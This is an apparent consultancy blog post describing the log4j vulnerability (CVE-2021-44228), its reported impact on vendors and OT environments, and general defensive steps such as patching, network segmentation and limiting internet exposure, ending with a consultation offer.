It seems that 2021 has been full of Cyber Security events or challenges. Well don’t worry 2021 is looking to go out with a Cyber Security finale with the “log4j” vulnerability that affects just about anything on the internet.
“log4j” is an Apache program that is free and open-source logging library that most companies use. The program records how programs run; they allow for code auditing and are a routine mechanism to investigate bugs and other functionality issues. Since “log4j” is free and widely trusted companies have been leveraging its use in all kinds of systems. What’s ironic is the fact the bug-checking tool is now a bug itself that is actively being exploited for malicious activities.
“log4j”’s official name is CVE-2021-44228 and it carries a severity rating of 10 on the Common Vulnerability Scoring System scale. 10 is the worst it can get. The “log4j” bug is a zero-day remote code that attackers can exploit to download and run scripts on targeted servers without any input from its victims.
“log4j” first made national headlines when its vulnerability took down Kronos payroll and HR services. Soon after it was discovered that “log4j” affected other vendors like VMWare, Schneider-Electric, Siemens, and many more.
One area that appears to be the most vulnerable are OT “operational technology” environments or critical infrastructures like power distribution and water facilities. Typically manufacturing environments are defenseless and typically hard or impossible to patch. However there are some basic things you can do to protect your environment and defend against Cyber Attackers.
First, patch any edge devices such as Next Generation Firewalls and public facing servers. Your firewalls will be your first line of defense to protect your environment from being exploited.
Second, install physical controls or isolate all industrial control and safety systems, components, peripheral equipment, and networks behind Next Generation Firewalls. Again many industrial devices do not have Cyber Security controls built in or can not be patched. The best way to defend industrial control devices is to physically segment them from the business environment and force any communications between the zones to flow through a firewall.
Third, minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.
Most of all if you don’t have an inventory system in place today now would be a great time to evaluate your inventory and cyber security posture, develop a path forward to identify Cyber Security risks, and ultimately develop a strategy to mitigate risks that could affect your environment.
If you or your organization need assistance with your Cyber Security strategy please feel free to reach out for a free consultation. You can reach us at [email protected] or call 727.220.2216 to setup an appointment to talk to a Cyber Security Specialists.